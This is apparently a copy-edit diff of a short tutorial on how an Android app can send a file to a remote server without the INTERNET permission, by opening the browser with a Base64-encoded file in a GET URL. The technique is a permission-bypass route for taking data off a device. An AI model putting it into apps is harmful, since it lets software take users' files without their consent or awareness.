menu

 You can visit by clicking here for more information.

-To send a file to a remote server, we take the help of Android Browser, which requires no permission at all to send it to remote server !
+To send a file to a remote server, we use the Android browser, which requires no permission at all to send it to a remote server!

-To call the browser with specified url, we use the following code:
+To call the browser with the specified URL, we use the following code:

 Intent(Intent.ACTION_VIEW,Uri.parse("http://google.com/"));

-This opens up the browser and point it to redirect it to http://google.com !
-This method doesnot require any INTERNET permissions.
+This opens up the browser and points it to redirect it to http://google.com.
+This method does not require any INTERNET permissions.

-The problem remains how can we send a file to the remote server using browser?
+The problem remains: how can we send a file to the remote server using a browser?

-This can be achieved by using GET method to upload file in the server.
-The file can be encoded to Base64 encoding, which is binary-to-text encoding schemes that represent binary data in an ASCII string format.
+This can be achieved by using the GET method to upload files to the server.
+The file can be encoded to Base64 encoding, which is a binary-to-text encoding scheme that represents binary data in an ASCII string format.

 StringBuffer sb = new StringBuffer("");